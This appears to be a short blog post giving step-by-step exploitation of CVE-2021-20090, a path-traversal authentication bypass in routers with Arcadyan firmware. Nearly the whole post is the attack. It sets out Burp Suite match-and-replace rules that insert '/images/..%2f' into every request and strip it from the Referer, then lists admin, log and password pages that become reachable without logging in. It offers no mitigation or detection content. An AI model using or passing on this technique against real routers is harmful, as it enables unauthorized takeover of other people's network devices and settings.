CVE-2021-20090 Arcadyan Routers Authentication Bypass Vulnerability

Introduction

Path traversal vulnerability in the web interface of routers with Arcadyan firmware (Buffalo, etc.) can be exploited to bypass authentication.

Exploit

1. Open Burp Suite and go to Proxy > Options tab and add Match and Replace rule to remove path traversal string from Referer in request header. 

Match /images/..%2f and replace it with /


2. Add another Match and Replace rule to prefix all URLs with images/..%2f

Match GET / and replace it with GET /images/..%2f


3. Now browse the router web interface pages through Burp Suite proxy browser. All the request URLs will be automatically modified by the proxy.


Some of the URLs which can be accessed without authentication:
http://targetip
http://targetip/info.html
http://targetip/log_log.html
http://targetip/lan_bridge.html
http://targetip/save_init.html
http://targetip/wireless_band2g.html
http://targetip/ap_password_access_date_ntp.html

Video



Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Dump memory to file from U-Boot console using Memory Display (md) log

Firmadyne Installation & Emulation of Firmware